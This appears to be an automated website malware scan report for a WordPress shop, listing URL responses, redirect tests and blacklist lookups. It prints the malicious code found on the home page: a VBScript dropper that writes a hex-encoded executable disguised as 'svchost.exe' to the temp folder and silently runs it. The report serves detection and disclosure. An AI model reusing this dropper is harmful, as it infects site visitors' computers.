Scanned pages/files
Request | Server response | Status |
http://objetstrouve.com/ | 200 OK Content-Length: 120053 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://objetstrouve.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 25 Dec 2015 07:06:37 GMT Pragma: no-cache Location: http://www.objetstrouve.com/test404page.js Server: Apache/2.2.15 (CentOS) Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=0t7lra4issojkmh35n9nlaga13; path=/ X-Pingback: http://www.objetstrouve.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.objetstrouve.com/test404page.js | 404 Not Found Content-Length: 19712 Content-Type: text/html | clean |
http://www.objetstrouve.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: text/javascript | clean |
http://www.objetstrouve.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://objetstrouve.com//www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.1.5/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 25 Dec 2015 07:06:42 GMT Pragma: no-cache Location: http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.1.5/ Server: Apache/2.2.15 (CentOS) Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=i1ksnja3ddasl010abnjitvqt7; path=/ X-Pingback: http://www.objetstrouve.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.1.5/ | 404 Not Found Content-Length: 19824 Content-Type: text/html | clean |
http://www.objetstrouve.com//www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.1.5/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 25 Dec 2015 07:06:44 GMT Pragma: no-cache Location: http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.1.5/ Server: Apache/2.2.15 (CentOS) Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=642kfoeh0gvcl0il4ttg922qa0; path=/ X-Pingback: http://www.objetstrouve.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://objetstrouve.com//www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.60/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 25 Dec 2015 07:06:45 GMT Pragma: no-cache Location: http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.60/ Server: Apache/2.2.15 (CentOS) Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=veu22eaaaj4i0uq5tm3pur6tq6; path=/ X-Pingback: http://www.objetstrouve.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockui.min.js?ver=2.60/ | 404 Not Found Content-Length: 19832 Content-Type: text/html | clean |
http://www.objetstrouve.com//www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.60/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 25 Dec 2015 07:06:47 GMT Pragma: no-cache Location: http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.60/ Server: Apache/2.2.15 (CentOS) Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=0rd65tkanbep2k9qlbi47fahp5; path=/ X-Pingback: http://www.objetstrouve.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://objetstrouve.com//www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=2.1.5/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 25 Dec 2015 07:06:49 GMT Pragma: no-cache Location: http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=2.1.5/ Server: Apache/2.2.15 (CentOS) Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=bisi6kp2pvqro9ae601l68q3l3; path=/ X-Pingback: http://www.objetstrouve.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=2.1.5/ | 404 Not Found Content-Length: 19818 Content-Type: text/html | clean |
http://www.objetstrouve.com//www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=2.1.5/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 25 Dec 2015 07:06:51 GMT Pragma: no-cache Location: http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=2.1.5/ Server: Apache/2.2.15 (CentOS) Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=u673d1dlrv83mv1lhji75pu7c0; path=/ X-Pingback: http://www.objetstrouve.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://objetstrouve.com//www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.3.1/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 25 Dec 2015 07:06:52 GMT Pragma: no-cache Location: http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.3.1/ Server: Apache/2.2.15 (CentOS) Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=kteanuq5ebn6d064r21hopvr84; path=/ X-Pingback: http://www.objetstrouve.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.3.1/ | 404 Not Found Content-Length: 19831 Content-Type: text/html | clean |
http://www.objetstrouve.com//www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.3.1/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 25 Dec 2015 07:06:54 GMT Pragma: no-cache Location: http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.3.1/ Server: Apache/2.2.15 (CentOS) Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=s3fthmga44819rtj6p325qafr2; path=/ X-Pingback: http://www.objetstrouve.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://objetstrouve.com//www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=2.1.5/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 25 Dec 2015 07:06:55 GMT Pragma: no-cache Location: http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=2.1.5/ Server: Apache/2.2.15 (CentOS) Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=3k0s2d4deqlba12ipusqq740n5; path=/ X-Pingback: http://www.objetstrouve.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=2.1.5/ | 404 Not Found Content-Length: 19821 Content-Type: text/html | clean |
http://www.objetstrouve.com//www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=2.1.5/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 25 Dec 2015 07:06:57 GMT Pragma: no-cache Location: http://www.objetstrouve.com/www.objetstrouve.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=2.1.5/ Server: Apache/2.2.15 (CentOS) Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=upvj5buick1b2goaa21bhljaq7; path=/ X-Pingback: http://www.objetstrouve.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.objetstrouve.com/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.yith-wcwl.js?ver=1.0 | 200 OK Content-Length: 2552 Content-Type: text/javascript | clean |
http://www.objetstrouve.com/wp-content/themes/flatsome/js/modernizr.js?ver=20120202 | 200 OK Content-Length: 4457 Content-Type: text/javascript | clean |
http://www.objetstrouve.com/wp-content/themes/flatsome/js/plugins.js?ver=20120202 | 200 OK Content-Length: 67504 Content-Type: text/javascript | clean |
http://www.objetstrouve.com/wp-content/themes/flatsome/js/jquery.iosslider.min.js?ver=20120202 | 200 OK Content-Length: 32886 Content-Type: text/javascript | clean |
http://www.objetstrouve.com/wp-content/themes/flatsome/js/jquery.magnific-popup.js?ver=20120202 | 200 OK Content-Length: 20941 Content-Type: text/javascript | clean |
http://www.objetstrouve.com/wp-content/themes/flatsome/js/theme.js?v=1.8.7&ver=20120202 | 200 OK Content-Length: 13333 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: objetstrouve.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Dec 2015 07:06:36 GMT
Accept-Ranges: bytes
ETag: "66c2095-1d4f5-5259c9b228a57"
Server: Apache/2.2.15 (CentOS)
Vary: User-Agent
Content-Length: 120053
Content-Type: text/html; charset=UTF-8
Last-Modified: Sat, 28 Nov 2015 16:50:31 GMT
...120053 bytes of data.
GET / HTTP/1.1
Host: objetstrouve.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Dec 2015 07:06:36 GMT
Accept-Ranges: bytes
ETag: "66c2095-1d4f5-5259c9b228a57"
Server: Apache/2.2.15 (CentOS)
Vary: User-Agent
Content-Length: 120053
Content-Type: text/html; charset=UTF-8
Last-Modified: Sat, 28 Nov 2015 16:50:31 GMT
...120053 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: objetstrouve.com
Referer: http://www.google.com/search?q=objetstrouve.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: objetstrouve.com
Referer: http://www.google.com/search?q=objetstrouve.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=objetstrouve.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://objetstrouve.com/
Result: objetstrouve.com is not infected or malware details are not published yet.
Result: objetstrouve.com is not infected or malware details are not published yet.